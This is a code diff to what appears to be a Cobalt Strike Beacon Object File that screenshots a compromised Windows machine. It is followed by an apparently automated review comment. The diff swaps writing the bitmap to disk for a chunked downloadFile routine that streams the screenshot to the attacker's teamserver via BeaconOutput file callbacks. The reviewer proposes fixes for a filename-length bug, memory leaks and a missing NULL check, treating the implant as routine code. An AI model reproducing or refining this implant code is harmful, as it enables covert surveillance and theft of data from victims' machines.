|
5 | 5 | #pragma comment(lib, "User32.lib") |
6 | 6 | #pragma comment(lib, "Gdi32.lib") |
7 | 7 |
|
| 8 | +char downloadfilename[] = "screenshot.bmp"; |
| 9 | +/*Download File*/ |
| 10 | +void downloadFile(char* fileName, int downloadFileNameLength, char* returnData, int fileSize) { |
8 | 11 |
|
| 12 | + //Intializes random number generator to create fileId |
| 13 | + time_t t; |
| 14 | + MSVCRT$srand((unsigned)MSVCRT$time(&t)); |
| 15 | + int fileId = MSVCRT$rand(); |
| 16 | + |
| 17 | + //8 bytes for fileId and fileSize |
| 18 | + int messageLength = downloadFileNameLength + 8; |
| 19 | + char* packedData = (char*)MSVCRT$malloc(messageLength); |
| 20 | + |
| 21 | + //pack on fileId as 4-byte int first |
| 22 | + packedData[0] = (fileId >> 24) & 0xFF; |
| 23 | + packedData[1] = (fileId >> 16) & 0xFF; |
| 24 | + packedData[2] = (fileId >> 8) & 0xFF; |
| 25 | + packedData[3] = fileId & 0xFF; |
| 26 | + |
| 27 | + //pack on fileSize as 4-byte int second |
| 28 | + packedData[4] = (fileSize >> 24) & 0xFF; |
| 29 | + packedData[5] = (fileSize >> 16) & 0xFF; |
| 30 | + packedData[6] = (fileSize >> 8) & 0xFF; |
| 31 | + packedData[7] = fileSize & 0xFF; |
| 32 | + |
| 33 | + int packedIndex = 8; |
| 34 | + |
| 35 | + //pack on the file name last |
| 36 | + for (int i = 0; i < downloadFileNameLength; i++) { |
| 37 | + packedData[packedIndex] = fileName[i]; |
| 38 | + packedIndex++; |
| 39 | + } |
| 40 | + |
| 41 | + BeaconOutput(CALLBACK_FILE, packedData, messageLength); |
| 42 | + |
| 43 | + if (fileSize > (1024 * 900)) { |
| 44 | + |
| 45 | + //Lets see how many times this constant goes into our file size, then add one (because if it doesn't go in at all, we still have one chunk) |
| 46 | + int numOfChunks = (fileSize / (1024 * 900)) + 1; |
| 47 | + int index = 0; |
| 48 | + int chunkSize = 1024 * 900; |
| 49 | + |
| 50 | + while (index < fileSize) { |
| 51 | + if (fileSize - index > chunkSize) {//We have plenty of room, grab the chunk and move on |
| 52 | + |
| 53 | + /*First 4 are the fileId |
| 54 | + then account for length of file |
| 55 | + then a byte for the good-measure null byte to be included |
| 56 | + then lastly is the 4-byte int of the fileSize*/ |
| 57 | + int chunkLength = 4 + chunkSize; |
| 58 | + char* packedChunk = (char*)MSVCRT$malloc(chunkLength); |
| 59 | + |
| 60 | + //pack on fileId as 4-byte int first |
| 61 | + packedChunk[0] = (fileId >> 24) & 0xFF; |
| 62 | + packedChunk[1] = (fileId >> 16) & 0xFF; |
| 63 | + packedChunk[2] = (fileId >> 8) & 0xFF; |
| 64 | + packedChunk[3] = fileId & 0xFF; |
| 65 | + |
| 66 | + int chunkIndex = 4; |
| 67 | + |
| 68 | + //pack on the file name last |
| 69 | + for (int i = index; i < index + chunkSize; i++) { |
| 70 | + packedChunk[chunkIndex] = returnData[i]; |
| 71 | + chunkIndex++; |
| 72 | + } |
| 73 | + |
| 74 | + BeaconOutput(CALLBACK_FILE_WRITE, packedChunk, chunkLength); |
| 75 | + |
| 76 | + } |
| 77 | + else {//This chunk is smaller than the chunkSize, so we have to be careful with our measurements |
| 78 | + |
| 79 | + int lastChunkLength = fileSize - index + 4; |
| 80 | + char* lastChunk = (char*)MSVCRT$malloc(lastChunkLength); |
| 81 | + |
| 82 | + //pack on fileId as 4-byte int first |
| 83 | + lastChunk[0] = (fileId >> 24) & 0xFF; |
| 84 | + lastChunk[1] = (fileId >> 16) & 0xFF; |
| 85 | + lastChunk[2] = (fileId >> 8) & 0xFF; |
| 86 | + lastChunk[3] = fileId & 0xFF; |
| 87 | + int lastChunkIndex = 4; |
| 88 | + |
| 89 | + //pack on the file name last |
| 90 | + for (int i = index; i < fileSize; i++) { |
| 91 | + lastChunk[lastChunkIndex] = returnData[i]; |
| 92 | + lastChunkIndex++; |
| 93 | + } |
| 94 | + BeaconOutput(CALLBACK_FILE_WRITE, lastChunk, lastChunkLength); |
| 95 | + } |
| 96 | + |
| 97 | + index = index + chunkSize; |
| 98 | + |
| 99 | + } |
| 100 | + |
| 101 | + } |
| 102 | + else { |
| 103 | + |
| 104 | + /*first 4 are the fileId |
| 105 | + then account for length of file |
| 106 | + then a byte for the good-measure null byte to be included |
| 107 | + then lastly is the 4-byte int of the fileSize*/ |
| 108 | + int chunkLength = 4 + fileSize; |
| 109 | + char* packedChunk = (char*)MSVCRT$malloc(chunkLength); |
| 110 | + |
| 111 | + //pack on fileId as 4-byte int first |
| 112 | + packedChunk[0] = (fileId >> 24) & 0xFF; |
| 113 | + packedChunk[1] = (fileId >> 16) & 0xFF; |
| 114 | + packedChunk[2] = (fileId >> 8) & 0xFF; |
| 115 | + packedChunk[3] = fileId & 0xFF; |
| 116 | + int chunkIndex = 4; |
| 117 | + |
| 118 | + //pack on the file name last |
| 119 | + for (int i = 0; i < fileSize; i++) { |
| 120 | + packedChunk[chunkIndex] = returnData[i]; |
| 121 | + chunkIndex++; |
| 122 | + } |
| 123 | + |
| 124 | + BeaconOutput(CALLBACK_FILE_WRITE, packedChunk, chunkLength); |
| 125 | + } |
| 126 | + |
| 127 | + |
| 128 | + //We need to tell the teamserver that we are done writing to this fileId |
| 129 | + char packedClose[4]; |
| 130 | + |
| 131 | + //pack on fileId as 4-byte int first |
| 132 | + packedClose[0] = (fileId >> 24) & 0xFF; |
| 133 | + packedClose[1] = (fileId >> 16) & 0xFF; |
| 134 | + packedClose[2] = (fileId >> 8) & 0xFF; |
| 135 | + packedClose[3] = fileId & 0xFF; |
| 136 | + BeaconOutput(CALLBACK_FILE_CLOSE, packedClose, 4); |
| 137 | + |
| 138 | + return; |
| 139 | +} |
9 | 140 |
|
10 | 141 | #pragma region error_handling |
11 | 142 | #define print_error(msg, hr) _print_error(__FUNCTION__, __LINE__, msg, hr) |
@@ -80,31 +211,39 @@ BOOL SaveHBITMAPToFile(HBITMAP hBitmap, LPCTSTR lpszFileName) |
80 | 211 | ReleaseDC(NULL, hDC); |
81 | 212 | } |
82 | 213 |
|
83 | | - fh = CreateFile(lpszFileName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, |
84 | | - FILE_ATTRIBUTE_NORMAL | FILE_FLAG_SEQUENTIAL_SCAN, NULL); |
| 214 | + //fh = CreateFile(lpszFileName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL | FILE_FLAG_SEQUENTIAL_SCAN, NULL); |
85 | 215 |
|
86 | | - if (fh == INVALID_HANDLE_VALUE) |
87 | | - return FALSE; |
| 216 | + //if (fh == INVALID_HANDLE_VALUE) |
| 217 | + // return FALSE; |
88 | 218 |
|
89 | 219 | bmfHdr.bfType = 0x4D42; // "BM" |
90 | 220 | dwDIBSize = sizeof(BITMAPFILEHEADER) + sizeof(BITMAPINFOHEADER) + dwPaletteSize + dwBmBitsSize; |
91 | 221 | bmfHdr.bfSize = dwDIBSize; |
92 | 222 | bmfHdr.bfReserved1 = 0; |
93 | 223 | bmfHdr.bfReserved2 = 0; |
94 | 224 | bmfHdr.bfOffBits = (DWORD)sizeof(BITMAPFILEHEADER) + (DWORD)sizeof(BITMAPINFOHEADER) + dwPaletteSize; |
| 225 | + void* bmpdata = malloc(sizeof(BITMAPFILEHEADER) + dwDIBSize); |
| 226 | + memcpy(bmpdata, &bmfHdr, sizeof(BITMAPFILEHEADER)); |
| 227 | + memcpy(((char*)bmpdata) + sizeof(BITMAPFILEHEADER), lpbi, dwDIBSize); |
| 228 | + |
95 | 229 |
|
96 | | - WriteFile(fh, (LPSTR)&bmfHdr, sizeof(BITMAPFILEHEADER), &dwWritten, NULL); |
| 230 | + downloadFile((char*)lpszFileName, sizeof(lpszFileName), (char*)bmpdata, (int)(sizeof(BITMAPFILEHEADER) + dwDIBSize)); |
| 231 | + //WriteFile(fh, (LPSTR)bmpdata, sizeof(BITMAPFILEHEADER)+ dwDIBSize, &dwWritten, NULL); |
97 | 232 |
|
98 | | - WriteFile(fh, (LPSTR)lpbi, dwDIBSize, &dwWritten, NULL); |
| 233 | + /* clean up */ |
99 | 234 | GlobalUnlock(hDib); |
100 | 235 | GlobalFree(hDib); |
101 | | - CloseHandle(fh); |
| 236 | + //CloseHandle(fh); |
102 | 237 | return TRUE; |
103 | 238 | } |
104 | 239 |
|
105 | 240 | #ifdef BOF |
106 | 241 | void go(char* buff, int len) { |
107 | | - BeaconPrintf(0x0, "[*] Tasked beacon to printscreen and save to disk"); |
| 242 | + datap parser; |
| 243 | + char * downloadfilename; |
| 244 | + BeaconDataParse(&parser, buff, len); |
| 245 | + downloadfilename = BeaconDataExtract(&parser, NULL); |
| 246 | + BeaconPrintf(0x0, "[*] Tasked beacon to printscreen and save to %s",downloadfilename); |
108 | 247 | int x1, y1, x2, y2, w, h; |
109 | 248 | // get screen dimensions |
110 | 249 | x1 = GetSystemMetrics(SM_XVIRTUALSCREEN); |
@@ -132,10 +271,10 @@ void go(char* buff, int len) { |
132 | 271 | */ |
133 | 272 |
|
134 | 273 | BeaconPrintf(0x0, "[+] PrintScreen saved to bitmap..."); |
135 | | - LPCSTR filename = "screenshot.bmp"; |
| 274 | + LPCSTR filename = (LPCSTR)downloadfilename; |
136 | 275 | SaveHBITMAPToFile(hBitmap, (LPCTSTR)filename); |
137 | 276 |
|
138 | | - BeaconPrintf(0x0, "[+] Printscreen bitmap saved to screenshot.bmp"); |
| 277 | + //BeaconPrintf(0x0, "[+] Printscreen bitmap saved to %s",downloadfilename); |
139 | 278 | // clean up |
140 | 279 | SelectObject(hDC, old_obj); |
141 | 280 | DeleteDC(hDC); |
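Review bot: `sizeof(lpszFileName)` in the new `downloadFile(...)` call in SaveHBITMAPToFile (hunk `@@ -80,31 +211,39 @@`) is the size of a pointer (4 or 8 bytes), not the length of the filename string, so the teamserver gets a truncated name and, for names shorter than that, the filename copy loop in downloadFile reads past the terminating NUL into adjacent bytes. The length should come from the string itself, e.g. `downloadFile((char*)lpszFileName, (int)MSVCRT$strlen(lpszFileName), (char*)bmpdata, (int)(sizeof(BITMAPFILEHEADER) + dwDIBSize));`, using whichever strlen decoration this file's BOF imports provide (the new downloadFile uses the `MSVCRT$` prefix for malloc/rand/time). `bmpdata` is malloc'd and never freed after the call, and downloadFile likewise never frees `packedData`, `packedChunk` or `lastChunk`; in a BOF these allocations persist in the beacon process, so a `MSVCRT$free(bmpdata)` after the call and matching frees after each BeaconOutput in downloadFile are worth adding. In go(), `downloadfilename = BeaconDataExtract(&parser, NULL)` is passed through with no NULL/empty check, so a task issued without an argument presumably reaches the same call with a NULL filename — confirm whether the aggressor script guarantees one.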
|